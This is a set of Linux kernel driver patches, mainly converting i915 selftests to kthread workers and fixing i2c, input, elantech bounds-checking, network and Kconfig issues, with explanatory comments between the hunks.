++++ b/drivers/gpu/drm/i915/gt/selftest_hangcheck.c
+@@ -866,10 +866,13 @@ static int igt_reset_active_engine(void *arg)
+ }
+ 
+ struct active_engine {
+-	struct task_struct *task;
++	struct kthread_worker *worker;
++	struct kthread_work work;
+ 	struct intel_engine_cs *engine;
+ 	unsigned long resets;
+ 	unsigned int flags;
++	bool stop;
++	int result;
+ };
+ 
+ #define TEST_ACTIVE	BIT(0)
+@@ -900,10 +903,10 @@ static int active_request_put(struct i915_request *rq)
+ 	return err;
+ }
+ 
+-static int active_engine(void *data)
++static void active_engine(struct kthread_work *work)
+ {
+ 	I915_RND_STATE(prng);
+-	struct active_engine *arg = data;
++	struct active_engine *arg = container_of(work, typeof(*arg), work);
+ 	struct intel_engine_cs *engine = arg->engine;
+ 	struct i915_request *rq[8] = {};
+ 	struct intel_context *ce[ARRAY_SIZE(rq)];
+@@ -913,16 +916,17 @@ static int active_engine(void *data)
+ 	for (count = 0; count < ARRAY_SIZE(ce); count++) {
+ 		ce[count] = intel_context_create(engine);
+ 		if (IS_ERR(ce[count])) {
+-			err = PTR_ERR(ce[count]);
+-			pr_err("[%s] Create context #%ld failed: %d!\n", engine->name, count, err);
++			arg->result = PTR_ERR(ce[count]);
++			pr_err("[%s] Create context #%ld failed: %d!\n",
++			       engine->name, count, arg->result);
+ 			while (--count)
+ 				intel_context_put(ce[count]);
+-			return err;
++			return;
+ 		}
+ 	}
+ 
+ 	count = 0;
+-	while (!kthread_should_stop()) {
++	while (!READ_ONCE(arg->stop)) {
+ 		unsigned int idx = count++ & (ARRAY_SIZE(rq) - 1);
+ 		struct i915_request *old = rq[idx];
+ 		struct i915_request *new;
+@@ -967,7 +971,7 @@ static int active_engine(void *data)
+ 		intel_context_put(ce[count]);
+ 	}
+ 
+-	return err;
++	arg->result = err;
+ }
+ 
+ static int __igt_reset_engines(struct intel_gt *gt,
+@@ -1022,7 +1026,7 @@ static int __igt_reset_engines(struct intel_gt *gt,
+ 
+ 		memset(threads, 0, sizeof(*threads) * I915_NUM_ENGINES);
+ 		for_each_engine(other, gt, tmp) {
+-			struct task_struct *tsk;
++			struct kthread_worker *worker;
+ 
+ 			threads[tmp].resets =
+ 				i915_reset_engine_count(global, other);
+@@ -1036,19 +1040,21 @@ static int __igt_reset_engines(struct intel_gt *gt,
+ 			threads[tmp].engine = other;
+ 			threads[tmp].flags = flags;
+ 
+-			tsk = kthread_run(active_engine, &threads[tmp],
+-					  "igt/%s", other->name);
+-			if (IS_ERR(tsk)) {
+-				err = PTR_ERR(tsk);
+-				pr_err("[%s] Thread spawn failed: %d!\n", engine->name, err);
++			worker = kthread_create_worker(0, "igt/%s",
++						       other->name);
++			if (IS_ERR(worker)) {
++				err = PTR_ERR(worker);
++				pr_err("[%s] Worker create failed: %d!\n",
++				       engine->name, err);
+ 				goto unwind;
+ 			}
+ 
+-			threads[tmp].task = tsk;
+-			get_task_struct(tsk);
+-		}
++			threads[tmp].worker = worker;
+ 
+-		yield(); /* start all threads before we begin */
++			kthread_init_work(&threads[tmp].work, active_engine);
++			kthread_queue_work(threads[tmp].worker,
++					   &threads[tmp].work);
++		}
+ 
+ 		st_engine_heartbeat_disable_no_pm(engine);
+ 		GEM_BUG_ON(test_and_set_bit(I915_RESET_ENGINE + id,
+@@ -1197,17 +1203,20 @@ unwind:
+ 		for_each_engine(other, gt, tmp) {
+ 			int ret;
+ 
+-			if (!threads[tmp].task)
++			if (!threads[tmp].worker)
+ 				continue;
+ 
+-			ret = kthread_stop(threads[tmp].task);
++			WRITE_ONCE(threads[tmp].stop, true);
++			kthread_flush_work(&threads[tmp].work);
++			ret = READ_ONCE(threads[tmp].result);
+ 			if (ret) {
+ 				pr_err("kthread for other engine %s failed, err=%d\n",
+ 				       other->name, ret);
+ 				if (!err)
+ 					err = ret;
+ 			}
+-			put_task_struct(threads[tmp].task);
++
++			kthread_destroy_worker(threads[tmp].worker);
+ 
+ 			/* GuC based resets are not logged per engine */
+ 			if (!using_guc) {
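
One consequence of the kthread_worker conversion shows up here: kthread_should_stop() only works for threads reaped by kthread_stop(), so a work item needs its own stop flag. Because that flag is written and read concurrently without a lock, the patch wraps both sides in WRITE_ONCE()/READ_ONCE() to keep the compiler from caching or tearing the accesses. The shape of the handshake, using the patch's own names:

/* requester */
WRITE_ONCE(threads[tmp].stop, true);	/* ask the work item to finish */
kthread_flush_work(&threads[tmp].work);	/* then wait until it has */

/* work item */
while (!READ_ONCE(arg->stop)) {
	/* one iteration of work */
}
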
+diff --git a/drivers/gpu/drm/i915/selftests/i915_request.c b/drivers/gpu/drm/i915/selftests/i915_request.c
+index 818a4909c1f35..a46350c37e9d4 100644
+--- a/drivers/gpu/drm/i915/selftests/i915_request.c
++++ b/drivers/gpu/drm/i915/selftests/i915_request.c
+@@ -299,9 +299,18 @@ __live_request_alloc(struct intel_context *ce)
+ 	return intel_context_create_request(ce);
+ }
+ 
+-static int __igt_breadcrumbs_smoketest(void *arg)
++struct smoke_thread {
++	struct kthread_worker *worker;
++	struct kthread_work work;
++	struct smoketest *t;
++	bool stop;
++	int result;
++};
++
++static void __igt_breadcrumbs_smoketest(struct kthread_work *work)
+ {
+-	struct smoketest *t = arg;
++	struct smoke_thread *thread = container_of(work, typeof(*thread), work);
++	struct smoketest *t = thread->t;
+ 	const unsigned int max_batch = min(t->ncontexts, t->max_batch) - 1;
+ 	const unsigned int total = 4 * t->ncontexts + 1;
+ 	unsigned int num_waits = 0, num_fences = 0;
+@@ -320,8 +329,10 @@ static int __igt_breadcrumbs_smoketest(void *arg)
+ 	 */
+ 
+ 	requests = kcalloc(total, sizeof(*requests), GFP_KERNEL);
+-	if (!requests)
+-		return -ENOMEM;
++	if (!requests) {
++		thread->result = -ENOMEM;
++		return;
++	}
+ 
+ 	order = i915_random_order(total, &prng);
+ 	if (!order) {
+@@ -329,7 +340,7 @@ static int __igt_breadcrumbs_smoketest(void *arg)
+ 		goto out_requests;
+ 	}
+ 
+-	while (!kthread_should_stop()) {
++	while (!READ_ONCE(thread->stop)) {
+ 		struct i915_sw_fence *submit, *wait;
+ 		unsigned int n, count;
+ 
+@@ -437,7 +448,7 @@ static int __igt_breadcrumbs_smoketest(void *arg)
+ 	kfree(order);
+ out_requests:
+ 	kfree(requests);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static int mock_breadcrumbs_smoketest(void *arg)
+@@ -450,7 +461,7 @@ static int mock_breadcrumbs_smoketest(void *arg)
+ 		.request_alloc = __mock_request_alloc
+ 	};
+ 	unsigned int ncpus = num_online_cpus();
+-	struct task_struct **threads;
++	struct smoke_thread *threads;
+ 	unsigned int n;
+ 	int ret = 0;
+ 
+@@ -479,28 +490,37 @@ static int mock_breadcrumbs_smoketest(void *arg)
+ 	}
+ 
+ 	for (n = 0; n < ncpus; n++) {
+-		threads[n] = kthread_run(__igt_breadcrumbs_smoketest,
+-					 &t, "igt/%d", n);
+-		if (IS_ERR(threads[n])) {
+-			ret = PTR_ERR(threads[n]);
++		struct kthread_worker *worker;
++
++		worker = kthread_create_worker(0, "igt/%d", n);
++		if (IS_ERR(worker)) {
++			ret = PTR_ERR(worker);
+ 			ncpus = n;
+ 			break;
+ 		}
+ 
+-		get_task_struct(threads[n]);
++		threads[n].worker = worker;
++		threads[n].t = &t;
++		threads[n].stop = false;
++		threads[n].result = 0;
++
++		kthread_init_work(&threads[n].work,
++				  __igt_breadcrumbs_smoketest);
++		kthread_queue_work(worker, &threads[n].work);
+ 	}
+ 
+-	yield(); /* start all threads before we begin */
+ 	msleep(jiffies_to_msecs(i915_selftest.timeout_jiffies));
+ 
+ 	for (n = 0; n < ncpus; n++) {
+ 		int err;
+ 
+-		err = kthread_stop(threads[n]);
++		WRITE_ONCE(threads[n].stop, true);
++		kthread_flush_work(&threads[n].work);
++		err = READ_ONCE(threads[n].result);
+ 		if (err < 0 && !ret)
+ 			ret = err;
+ 
+-		put_task_struct(threads[n]);
++		kthread_destroy_worker(threads[n].worker);
+ 	}
+ 	pr_info("Completed %lu waits for %lu fence across %d cpus\n",
+ 		atomic_long_read(&t.num_waits),
+@@ -1419,9 +1439,18 @@ out_free:
+ 	return err;
+ }
+ 
+-static int __live_parallel_engine1(void *arg)
++struct parallel_thread {
++	struct kthread_worker *worker;
++	struct kthread_work work;
++	struct intel_engine_cs *engine;
++	int result;
++};
++
++static void __live_parallel_engine1(struct kthread_work *work)
+ {
+-	struct intel_engine_cs *engine = arg;
++	struct parallel_thread *thread =
++		container_of(work, typeof(*thread), work);
++	struct intel_engine_cs *engine = thread->engine;
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 	int err = 0;
+@@ -1452,12 +1481,14 @@ static int __live_parallel_engine1(void *arg)
+ 	intel_engine_pm_put(engine);
+ 
+ 	pr_info("%s: %lu request + sync\n", engine->name, count);
+-	return err;
++	thread->result = err;
+ }
+ 
+-static int __live_parallel_engineN(void *arg)
++static void __live_parallel_engineN(struct kthread_work *work)
+ {
+-	struct intel_engine_cs *engine = arg;
++	struct parallel_thread *thread =
++		container_of(work, typeof(*thread), work);
++	struct intel_engine_cs *engine = thread->engine;
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 	int err = 0;
+@@ -1479,7 +1510,7 @@ static int __live_parallel_engineN(void *arg)
+ 	intel_engine_pm_put(engine);
+ 
+ 	pr_info("%s: %lu requests\n", engine->name, count);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static bool wake_all(struct drm_i915_private *i915)
+@@ -1505,9 +1536,11 @@ static int wait_for_all(struct drm_i915_private *i915)
+ 	return -ETIME;
+ }
+ 
+-static int __live_parallel_spin(void *arg)
++static void __live_parallel_spin(struct kthread_work *work)
+ {
+-	struct intel_engine_cs *engine = arg;
++	struct parallel_thread *thread =
++		container_of(work, typeof(*thread), work);
++	struct intel_engine_cs *engine = thread->engine;
+ 	struct igt_spinner spin;
+ 	struct i915_request *rq;
+ 	int err = 0;
+@@ -1520,7 +1553,8 @@ static int __live_parallel_spin(void *arg)
+ 
+ 	if (igt_spinner_init(&spin, engine->gt)) {
+ 		wake_all(engine->i915);
+-		return -ENOMEM;
++		thread->result = -ENOMEM;
++		return;
+ 	}
+ 
+ 	intel_engine_pm_get(engine);
+@@ -1553,22 +1587,22 @@ static int __live_parallel_spin(void *arg)
+ 
+ out_spin:
+ 	igt_spinner_fini(&spin);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static int live_parallel_engines(void *arg)
+ {
+ 	struct drm_i915_private *i915 = arg;
+-	static int (* const func[])(void *arg) = {
++	static void (* const func[])(struct kthread_work *) = {
+ 		__live_parallel_engine1,
+ 		__live_parallel_engineN,
+ 		__live_parallel_spin,
+ 		NULL,
+ 	};
+ 	const unsigned int nengines = num_uabi_engines(i915);
++	struct parallel_thread *threads;
+ 	struct intel_engine_cs *engine;
+-	int (* const *fn)(void *arg);
+-	struct task_struct **tsk;
++	void (* const *fn)(struct kthread_work *);
+ 	int err = 0;
+ 
+ 	/*
+@@ -1576,8 +1610,8 @@ static int live_parallel_engines(void *arg)
+ 	 * tests that we load up the system maximally.
+ 	 */
+ 
+-	tsk = kcalloc(nengines, sizeof(*tsk), GFP_KERNEL);
+-	if (!tsk)
++	threads = kcalloc(nengines, sizeof(*threads), GFP_KERNEL);
++	if (!threads)
+ 		return -ENOMEM;
+ 
+ 	for (fn = func; !err && *fn; fn++) {
+@@ -1594,37 +1628,44 @@ static int live_parallel_engines(void *arg)
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
+-			tsk[idx] = kthread_run(*fn, engine,
+-					       "igt/parallel:%s",
+-					       engine->name);
+-			if (IS_ERR(tsk[idx])) {
+-				err = PTR_ERR(tsk[idx]);
++			struct kthread_worker *worker;
++
++			worker = kthread_create_worker(0, "igt/parallel:%s",
++						       engine->name);
++			if (IS_ERR(worker)) {
++				err = PTR_ERR(worker);
+ 				break;
+ 			}
+-			get_task_struct(tsk[idx++]);
+-		}
+ 
+-		yield(); /* start all threads before we kthread_stop() */
++			threads[idx].worker = worker;
++			threads[idx].result = 0;
++			threads[idx].engine = engine;
++
++			kthread_init_work(&threads[idx].work, *fn);
++			kthread_queue_work(worker, &threads[idx].work);
++			idx++;
++		}
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
+ 			int status;
+ 
+-			if (IS_ERR(tsk[idx]))
++			if (!threads[idx].worker)
+ 				break;
+ 
+-			status = kthread_stop(tsk[idx]);
++			kthread_flush_work(&threads[idx].work);
++			status = READ_ONCE(threads[idx].result);
+ 			if (status && !err)
+ 				err = status;
+ 
+-			put_task_struct(tsk[idx++]);
++			kthread_destroy_worker(threads[idx++].worker);
+ 		}
+ 
+ 		if (igt_live_test_end(&t))
+ 			err = -EIO;
+ 	}
+ 
+-	kfree(tsk);
++	kfree(threads);
+ 	return err;
+ }
+ 
+@@ -1672,7 +1713,7 @@ static int live_breadcrumbs_smoketest(void *arg)
+ 	const unsigned int ncpus = num_online_cpus();
+ 	unsigned long num_waits, num_fences;
+ 	struct intel_engine_cs *engine;
+-	struct task_struct **threads;
++	struct smoke_thread *threads;
+ 	struct igt_live_test live;
+ 	intel_wakeref_t wakeref;
+ 	struct smoketest *smoke;
+@@ -1746,23 +1787,26 @@ static int live_breadcrumbs_smoketest(void *arg)
+ 			 smoke[idx].max_batch, engine->name);
+ 
+ 		for (n = 0; n < ncpus; n++) {
+-			struct task_struct *tsk;
++			unsigned int i = idx * ncpus + n;
++			struct kthread_worker *worker;
+ 
+-			tsk = kthread_run(__igt_breadcrumbs_smoketest,
+-					  &smoke[idx], "igt/%d.%d", idx, n);
+-			if (IS_ERR(tsk)) {
+-				ret = PTR_ERR(tsk);
++			worker = kthread_create_worker(0, "igt/%d.%d", idx, n);
++			if (IS_ERR(worker)) {
++				ret = PTR_ERR(worker);
+ 				goto out_flush;
+ 			}
+ 
+-			get_task_struct(tsk);
+-			threads[idx * ncpus + n] = tsk;
++			threads[i].worker = worker;
++			threads[i].t = &smoke[idx];
++
++			kthread_init_work(&threads[i].work,
++					  __igt_breadcrumbs_smoketest);
++			kthread_queue_work(worker, &threads[i].work);
+ 		}
+ 
+ 		idx++;
+ 	}
+ 
+-	yield(); /* start all threads before we begin */
+ 	msleep(jiffies_to_msecs(i915_selftest.timeout_jiffies));
+ 
+ out_flush:
+@@ -1771,17 +1815,19 @@ out_flush:
+ 	num_fences = 0;
+ 	for_each_uabi_engine(engine, i915) {
+ 		for (n = 0; n < ncpus; n++) {
+-			struct task_struct *tsk = threads[idx * ncpus + n];
++			unsigned int i = idx * ncpus + n;
+ 			int err;
+ 
+-			if (!tsk)
++			if (!threads[i].worker)
+ 				continue;
+ 
+-			err = kthread_stop(tsk);
++			WRITE_ONCE(threads[i].stop, true);
++			kthread_flush_work(&threads[i].work);
++			err = READ_ONCE(threads[i].result);
+ 			if (err < 0 && !ret)
+ 				ret = err;
+ 
+-			put_task_struct(tsk);
++			kthread_destroy_worker(threads[i].worker);
+ 		}
+ 
+ 		num_waits += atomic_long_read(&smoke[idx].num_waits);
+@@ -2891,9 +2937,18 @@ out:
+ 	return err;
+ }
+ 
+-static int p_sync0(void *arg)
++struct p_thread {
++	struct perf_stats p;
++	struct kthread_worker *worker;
++	struct kthread_work work;
++	struct intel_engine_cs *engine;
++	int result;
++};
++
++static void p_sync0(struct kthread_work *work)
+ {
+-	struct perf_stats *p = arg;
++	struct p_thread *thread = container_of(work, typeof(*thread), work);
++	struct perf_stats *p = &thread->p;
+ 	struct intel_engine_cs *engine = p->engine;
+ 	struct intel_context *ce;
+ 	IGT_TIMEOUT(end_time);
+@@ -2902,13 +2957,16 @@ static int p_sync0(void *arg)
+ 	int err = 0;
+ 
+ 	ce = intel_context_create(engine);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
++	if (IS_ERR(ce)) {
++		thread->result = PTR_ERR(ce);
++		return;
++	}
+ 
+ 	err = intel_context_pin(ce);
+ 	if (err) {
+ 		intel_context_put(ce);
+-		return err;
++		thread->result = err;
++		return;
+ 	}
+ 
+ 	if (intel_engine_supports_stats(engine)) {
+@@ -2958,12 +3016,13 @@ static int p_sync0(void *arg)
+ 
+ 	intel_context_unpin(ce);
+ 	intel_context_put(ce);
+-	return err;
++	thread->result = err;
+ }
+ 
+-static int p_sync1(void *arg)
++static void p_sync1(struct kthread_work *work)
+ {
+-	struct perf_stats *p = arg;
++	struct p_thread *thread = container_of(work, typeof(*thread), work);
++	struct perf_stats *p = &thread->p;
+ 	struct intel_engine_cs *engine = p->engine;
+ 	struct i915_request *prev = NULL;
+ 	struct intel_context *ce;
+@@ -2973,13 +3032,16 @@ static int p_sync1(void *arg)
+ 	int err = 0;
+ 
+ 	ce = intel_context_create(engine);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
++	if (IS_ERR(ce)) {
++		thread->result = PTR_ERR(ce);
++		return;
++	}
+ 
+ 	err = intel_context_pin(ce);
+ 	if (err) {
+ 		intel_context_put(ce);
+-		return err;
++		thread->result = err;
++		return;
+ 	}
+ 
+ 	if (intel_engine_supports_stats(engine)) {
+@@ -3031,12 +3093,13 @@ static int p_sync1(void *arg)
+ 
+ 	intel_context_unpin(ce);
+ 	intel_context_put(ce);
+-	return err;
++	thread->result = err;
+ }
+ 
+-static int p_many(void *arg)
++static void p_many(struct kthread_work *work)
+ {
+-	struct perf_stats *p = arg;
++	struct p_thread *thread = container_of(work, typeof(*thread), work);
++	struct perf_stats *p = &thread->p;
+ 	struct intel_engine_cs *engine = p->engine;
+ 	struct intel_context *ce;
+ 	IGT_TIMEOUT(end_time);
+@@ -3045,13 +3108,16 @@ static int p_many(void *arg)
+ 	bool busy;
+ 
+ 	ce = intel_context_create(engine);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
++	if (IS_ERR(ce)) {
++		thread->result = PTR_ERR(ce);
++		return;
++	}
+ 
+ 	err = intel_context_pin(ce);
+ 	if (err) {
+ 		intel_context_put(ce);
+-		return err;
++		thread->result = err;
++		return;
+ 	}
+ 
+ 	if (intel_engine_supports_stats(engine)) {
+@@ -3092,26 +3158,23 @@ static int p_many(void *arg)
+ 
+ 	intel_context_unpin(ce);
+ 	intel_context_put(ce);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static int perf_parallel_engines(void *arg)
+ {
+ 	struct drm_i915_private *i915 = arg;
+-	static int (* const func[])(void *arg) = {
++	static void (* const func[])(struct kthread_work *) = {
+ 		p_sync0,
+ 		p_sync1,
+ 		p_many,
+ 		NULL,
+ 	};
+ 	const unsigned int nengines = num_uabi_engines(i915);
++	void (* const *fn)(struct kthread_work *);
+ 	struct intel_engine_cs *engine;
+-	int (* const *fn)(void *arg);
+ 	struct pm_qos_request qos;
+-	struct {
+-		struct perf_stats p;
+-		struct task_struct *tsk;
+-	} *engines;
++	struct p_thread *engines;
+ 	int err = 0;
+ 
+ 	engines = kcalloc(nengines, sizeof(*engines), GFP_KERNEL);
+@@ -3134,36 +3197,45 @@ static int perf_parallel_engines(void *arg)
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
++			struct kthread_worker *worker;
++
+ 			intel_engine_pm_get(engine);
+ 
+ 			memset(&engines[idx].p, 0, sizeof(engines[idx].p));
+-			engines[idx].p.engine = engine;
+ 
+-			engines[idx].tsk = kthread_run(*fn, &engines[idx].p,
+-						       "igt:%s", engine->name);
+-			if (IS_ERR(engines[idx].tsk)) {
+-				err = PTR_ERR(engines[idx].tsk);
++			worker = kthread_create_worker(0, "igt:%s",
++						       engine->name);
++			if (IS_ERR(worker)) {
++				err = PTR_ERR(worker);
+ 				intel_engine_pm_put(engine);
+ 				break;
+ 			}
+-			get_task_struct(engines[idx++].tsk);
+-		}
++			engines[idx].worker = worker;
++			engines[idx].result = 0;
++			engines[idx].p.engine = engine;
++			engines[idx].engine = engine;
+ 
+-		yield(); /* start all threads before we kthread_stop() */
++			kthread_init_work(&engines[idx].work, *fn);
++			kthread_queue_work(worker, &engines[idx].work);
++			idx++;
++		}
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
+ 			int status;
+ 
+-			if (IS_ERR(engines[idx].tsk))
++			if (!engines[idx].worker)
+ 				break;
+ 
+-			status = kthread_stop(engines[idx].tsk);
++			kthread_flush_work(&engines[idx].work);
++			status = READ_ONCE(engines[idx].result);
+ 			if (status && !err)
+ 				err = status;
+ 
+ 			intel_engine_pm_put(engine);
+-			put_task_struct(engines[idx++].tsk);
++
++			kthread_destroy_worker(engines[idx].worker);
++			idx++;
+ 		}
+ 
+ 		if (igt_live_test_end(&t))
+diff --git a/drivers/i2c/busses/i2c-mv64xxx.c b/drivers/i2c/busses/i2c-mv64xxx.c
+index 047dfef7a6577..878c076ebdc6b 100644
+--- a/drivers/i2c/busses/i2c-mv64xxx.c
++++ b/drivers/i2c/busses/i2c-mv64xxx.c
+@@ -520,6 +520,17 @@ mv64xxx_i2c_intr(int irq, void *dev_id)
+ 
+ 	while (readl(drv_data->reg_base + drv_data->reg_offsets.control) &
+ 						MV64XXX_I2C_REG_CONTROL_IFLG) {
++		/*
++		 * It seems that sometimes the controller updates the status
++		 * register only after it asserts IFLG in the control register.
++		 * This may result in weird bugs when in atomic mode. A delay
++		 * of 100 ns before reading the status register solves this
++		 * issue. This bug does not seem to appear when using
++		 * interrupts.
++		 */
++		if (drv_data->atomic)
++			ndelay(100);
++
+ 		status = readl(drv_data->reg_base + drv_data->reg_offsets.status);
+ 		mv64xxx_i2c_fsm(drv_data, status);
+ 		mv64xxx_i2c_do_action(drv_data);
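
Worth noting about the fix above: ndelay() busy-waits, so it is legal on the atomic path where sleeping primitives such as usleep_range() are not, and the drv_data->atomic guard keeps the extra 100 ns off the interrupt-driven path, where the problem was not observed. The generic shape (polling_atomically and status_reg are hypothetical names):

if (polling_atomically)
	ndelay(100);		/* busy-wait: safe in atomic context */
status = readl(status_reg);	/* read only after HW has settled */
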
+diff --git a/drivers/i2c/busses/i2c-sprd.c b/drivers/i2c/busses/i2c-sprd.c
+index 4fe15cd78907e..ffc54fbf814dd 100644
+--- a/drivers/i2c/busses/i2c-sprd.c
++++ b/drivers/i2c/busses/i2c-sprd.c
+@@ -576,12 +576,14 @@ static int sprd_i2c_remove(struct platform_device *pdev)
+ 	struct sprd_i2c *i2c_dev = platform_get_drvdata(pdev);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(i2c_dev->dev);
++	ret = pm_runtime_get_sync(i2c_dev->dev);
+ 	if (ret < 0)
+-		return ret;
++		dev_err(&pdev->dev, "Failed to resume device (%pe)\n", ERR_PTR(ret));
+ 
+ 	i2c_del_adapter(&i2c_dev->adap);
+-	clk_disable_unprepare(i2c_dev->clk);
++
++	if (ret >= 0)
++		clk_disable_unprepare(i2c_dev->clk);
+ 
+ 	pm_runtime_put_noidle(i2c_dev->dev);
+ 	pm_runtime_disable(i2c_dev->dev);
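
The remove() change above encodes a teardown rule: a failed runtime resume must not abort device removal (pm_runtime_resume_and_get() returning early leaked the adapter), but removal must also skip undoing what resume never did - hence clk_disable_unprepare() is now conditional on ret >= 0, avoiding an unbalanced clock disable. The pattern, condensed from the hunk with the driver's locals shortened:

ret = pm_runtime_get_sync(dev);		/* may fail; never aborts remove */
if (ret < 0)
	dev_err(dev, "resume failed (%pe)\n", ERR_PTR(ret));

i2c_del_adapter(adap);			/* teardown happens regardless */

if (ret >= 0)				/* only undo what resume did */
	clk_disable_unprepare(clk);
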
+diff --git a/drivers/input/input.c b/drivers/input/input.c
+index ebb2b7f0f8ff4..8b6a922f84702 100644
+--- a/drivers/input/input.c
++++ b/drivers/input/input.c
+@@ -701,7 +701,7 @@ void input_close_device(struct input_handle *handle)
+ 
+ 	__input_release_device(handle);
+ 
+-	if (!dev->inhibited && !--dev->users) {
++	if (!--dev->users && !dev->inhibited) {
+ 		if (dev->poller)
+ 			input_dev_poller_stop(dev->poller);
+ 		if (dev->close)
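
The one-line swap above is about && short-circuiting: in the old order, an inhibited device never evaluated --dev->users, so every close on an inhibited device leaked a user reference. Putting the decrement first makes it unconditional; only the decision to run the close path depends on the inhibit state. A standalone demonstration:

#include <stdio.h>

int main(void)
{
	int users, inhibited = 1;

	users = 1;
	if (!inhibited && !--users)	/* short-circuit: --users is skipped */
		puts("old order: close()");
	printf("old order leaves users=%d (leaked)\n", users);	/* 1 */

	users = 1;
	if (!--users && !inhibited)	/* decrement always runs */
		puts("new order: close()");
	printf("new order leaves users=%d (balanced)\n", users);	/* 0 */

	return 0;
}
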
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index cd36cf7165423..76cbcca13c9e9 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -282,7 +282,6 @@ static const struct xpad_device {
+ 	{ 0x1430, 0xf801, "RedOctane Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x146b, 0x0601, "BigBen Interactive XBOX 360 Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x146b, 0x0604, "Bigben Interactive DAIJA Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOX360 },
+-	{ 0x1532, 0x0037, "Razer Sabertooth", 0, XTYPE_XBOX360 },
+ 	{ 0x1532, 0x0a00, "Razer Atrox Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOXONE },
+ 	{ 0x1532, 0x0a03, "Razer Wildcat", 0, XTYPE_XBOXONE },
+ 	{ 0x15e4, 0x3f00, "Power A Mini Pro Elite", 0, XTYPE_XBOX360 },
+diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c
+index ece97f8c6a3e3..2118b2075f437 100644
+--- a/drivers/input/mouse/elantech.c
++++ b/drivers/input/mouse/elantech.c
+@@ -674,10 +674,11 @@ static void process_packet_head_v4(struct psmouse *psmouse)
+ 	struct input_dev *dev = psmouse->dev;
+ 	struct elantech_data *etd = psmouse->private;
+ 	unsigned char *packet = psmouse->packet;
+-	int id = ((packet[3] & 0xe0) >> 5) - 1;
++	int id;
+ 	int pres, traces;
+ 
+-	if (id < 0)
++	id = ((packet[3] & 0xe0) >> 5) - 1;
++	if (id < 0 || id >= ETP_MAX_FINGERS)
+ 		return;
+ 
+ 	etd->mt[id].x = ((packet[1] & 0x0f) << 8) | packet[2];
+@@ -707,7 +708,7 @@ static void process_packet_motion_v4(struct psmouse *psmouse)
+ 	int id, sid;
+ 
+ 	id = ((packet[0] & 0xe0) >> 5) - 1;
+-	if (id < 0)
++	if (id < 0 || id >= ETP_MAX_FINGERS)
+ 		return;
+ 
+ 	sid = ((packet[3] & 0xe0) >> 5) - 1;
+@@ -728,7 +729,7 @@ static void process_packet_motion_v4(struct psmouse *psmouse)
+ 	input_report_abs(dev, ABS_MT_POSITION_X, etd->mt[id].x);
+ 	input_report_abs(dev, ABS_MT_POSITION_Y, etd->mt[id].y);
+ 
+-	if (sid >= 0) {
++	if (sid >= 0 && sid < ETP_MAX_FINGERS) {
+ 		etd->mt[sid].x += delta_x2 * weight;
+ 		etd->mt[sid].y -= delta_y2 * weight;
+ 		input_mt_slot(dev, sid);
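
The elantech checks above matter because the finger id comes from a hardware-controlled packet field: a 3-bit value minus one spans [-1, 6], which can exceed the bound of the etd->mt[] array (sized ETP_MAX_FINGERS), so both ends must be validated before indexing:

int id = ((packet[3] & 0xe0) >> 5) - 1;	/* 3-bit field - 1: range [-1, 6] */
if (id < 0 || id >= ETP_MAX_FINGERS)	/* reject both underflow and overflow */
	return;
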
+diff --git a/drivers/misc/eeprom/Kconfig b/drivers/misc/eeprom/Kconfig
+index f0a7531f354c1..2d240bfa819f8 100644
+--- a/drivers/misc/eeprom/Kconfig
++++ b/drivers/misc/eeprom/Kconfig
+@@ -6,6 +6,7 @@ config EEPROM_AT24
+ 	depends on I2C && SYSFS
+ 	select NVMEM
+ 	select NVMEM_SYSFS
++	select REGMAP
+ 	select REGMAP_I2C
+ 	help
+ 	  Enable this driver to get read/write support to most I2C EEPROMs
+diff --git a/drivers/net/dsa/lan9303-core.c b/drivers/net/dsa/lan9303-core.c
+index 2e270b4791432..a08e7cbb23c91 100644
+--- a/drivers/net/dsa/lan9303-core.c
++++ b/drivers/net/dsa/lan9303-core.c
+@@ -1199,8 +1199,6 @@ static int lan9303_port_fdb_add(struct dsa_switch *ds, int port,
+ 	struct lan9303 *chip = ds->priv;
+ 
+ 	dev_dbg(chip->dev, "%s(%d, %pM, %d)\n", __func__, port, addr, vid);
+-	if (vid)
+-		return -EOPNOTSUPP;
+ 
+ 	return lan9303_alr_add_port(chip, addr, port, false);
+ }
+@@ -1212,8 +1210,6 @@ static int lan9303_port_fdb_del(struct dsa_switch *ds, int port,
+ 	struct lan9303 *chip = ds->priv;
+ 
+ 	dev_dbg(chip->dev, "%s(%d, %pM, %d)\n", __func__, port, addr, vid);
+-	if (vid)
+-		return -EOPNOTSUPP;
+ 	lan9303_alr_del_port(chip, addr, port);
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index e3e5a427222f6..6469fb8a42a89 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -2389,6 +2389,9 @@ static int bnxt_async_event_process(struct bnxt *bp,
+ 				struct bnxt_ptp_cfg *ptp = bp->ptp_cfg;
+ 				u64 ns;
+ 
++				if (!ptp)
++					goto async_event_process_exit;
++
+ 				spin_lock_bh(&ptp->ptp_lock);
+ 				bnxt_ptp_update_current_time(bp);
+ 				ns = (((u64)BNXT_EVENT_PHC_RTC_UPDATE(data1) <<
